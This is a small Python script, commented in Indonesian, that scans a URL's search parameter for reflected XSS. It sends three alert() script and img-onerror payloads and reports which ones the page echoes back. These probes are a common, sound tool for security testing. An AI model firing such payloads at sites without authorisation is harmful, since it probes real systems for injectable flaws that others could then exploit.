import requests
from urllib.parse import urlencode

# Daftar payload sederhana untuk XSS
payloads = [
    "<script>alert('XSS')</script>",
    "'\"><script>alert('XSS')</script>",
    "<img src=x onerror=alert('XSS')>",
]

def scan_xss(url):
    results = []
    print("\nStart to request URL with requests.\n")

    for payload in payloads:
        params = {'q': payload}
        full_url = f"{url}?{urlencode(params)}"
        print(f"Start to put traffic: {full_url}")
        try:
            response = requests.get(full_url)
            if payload in response.text:
                print(f"\033[91mReflected XSS found in {full_url}\033[0m")
                results.append((1, "Reflected XSS", full_url))
            else:
                print(f"No reflected XSS in {full_url}")
                results.append((0, "No XSS", full_url))
        except Exception as e:
            print(f"Error happened: {e}")
            results.append((0, "Error", full_url))

    print("\nResult summary:")
    print("+----+-----------------+-------------------------------------+")
    print("| ID | VUL             | URL                                 |")
    print("+----+-----------------+-------------------------------------+")

    for i, (vul_id, vul_desc, vul_url) in enumerate(results):
        print(f"| {i+1}  | {vul_desc} | {vul_url} |")

    print("+----+-----------------+-------------------------------------+")
    return results

# URL target
url = "http://example.com/search"

# Menjalankan pemindai XSS
scan_xss(url)
